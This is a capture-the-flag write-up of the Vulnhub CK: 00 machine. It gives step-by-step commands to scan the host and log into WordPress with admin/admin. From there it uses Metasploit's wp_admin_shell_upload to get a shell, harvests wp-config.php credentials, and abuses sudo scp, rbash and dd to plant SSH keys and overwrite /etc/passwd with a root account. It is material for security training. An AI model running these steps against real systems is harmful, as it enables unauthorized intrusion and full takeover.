CK: 00 Vulnhub Walkthrough

In this article, we will see a walkthrough of an interesting Vulnhub machine called CK: 00. This VM machine is made by Vishal Biswas hosted on Vulnhub You can download here

Description

Goal: Your goal will be to get the highest privileged user and collect the flag

Network Scanning

First, we run netdiscover find our target IP

netdiscover
CK: 00 Vulnhub Walkthrough | CK: 00 Vulnhub Writeup

In my case, my target Ip is 192.168.1.14 our next step is performing Nmap Aggressive scan

nmap -a -p- 192.168.1.14
CK: 00 Vulnhub Walkthrough | CK: 00 Vulnhub Writeup

I open the target IP browser and we see an error so I copy the VM IP and create a virtual host CK /etc/hosts file

vi /etc/hosts
192.168.1.14 ck
CK: 00 Vulnhub Walkthrough | CK: 00 Vulnhub Writeup

Again refresh the page and we see the WordPress default templet

http://192.168.1.14
CK: 00 Vulnhub Walkthrough | CK: 00 Vulnhub Writeup

try common password login WordPress And I successfully login with administrator account using this username admin and password admin

We have WordPress login username and password without wasting our time I ran msfconsole and load an exploit wp_admin_shell_upload

msfdb run
use exploit/unix/webapp/wp_admin_shell_upload
set username admin
set password admin
set rhost 192.168.1.14
run
CK: 00 Vulnhub Walkthrough | CK: 00 Vulnhub Writeup

I ran the shell command for shell command environment and we see a blank shell let’s importing python3 spawn shell using this command

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

We found our flag user CK home directory

cd ck
ls -lsa
cat ck00-local-flag
CK: 00 Vulnhub Walkthrough | CK: 00 Vulnhub Writeup

I move on apache server public directory here we see WordPress wp-config.php I read the file and we see target database username and password

cd /var/www/html
cat wp-config.php
CK: 00 Vulnhub Walkthrough | CK: 00 Vulnhub Writeup

Privilege Escalation

I try MySQL database password for every user we successful login with bla user using a database password

su bla 
/bin/bash
CK: 00 Vulnhub Walkthrough | CK: 00 Vulnhub Writeup
Privilege Escalation scp

We have a user bla password so I ran the sudo -l command and we see our current user run SCP command without user bla1 password

sudo -l

I already generate an ssh key our local machine using this command ssh-keygen I upload our ssh public authorized_keys id_rsa.pub user bla1 /home/.ssh/authorized_keys directory using this command

sudo -u bla1 scp [email protected]:~/.ssh/id_rsa.pub /home/bla1/.ssh/authorized_keys

We see the terminal our key is upload successfully I exit our shell and connect to ssh user bla1 without password

ssh [email protected]
Privilege Escalation rbash

again run the sudo -l command and we see the user CK-00 is run /bin/rbash command without asking password CK-00

sudo -l
sudo -u ck-00 /bin/rbash
CK: 00 Vulnhub Walkthrough | CK: 00 Vulnhub Writeup

After executing the rabash command our many commands are restricted many ways to escape restricted shells, I ran the sh command and bash command I bypass the restricted shell

Privilege Escalation dd

again run the sudo -l command and finally, we see our user CK-oo is run the dd command without asking root password

sudo -l

I generate an md5 salted password our new user Rahul

openssl passwd -1 -salt rahul password
$1$rahul$7hgGd2S2A0ooTWXZ8YjwJ0

using the cat command to we see /etc/passwd file and copy file text and create a new passwd file CK /home directory using cat >> append method to paste our passwd

cat >>passwd
rahul:$1$rahul$7hgGd2S2A0ooTWXZ8YjwJ0:0:0:root:/root/bin/bash

I already create a passwd file using CK user home directory and over next step is overwrite the /etc/passwd file with our new passwd file using this command

cat passwd |sudo dd of=/etc/passwd

our new user Rahul and password is pasted successfully/etc/passwd file we confirm the username password entry passwd file using tail command

tail -n 3 /etc/passwd
su rahul
Root Flag
cd /root
ls
cat ck00-root-flag.txt
Vulnuni 1-0-1 Vulnhub Walkthrough link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →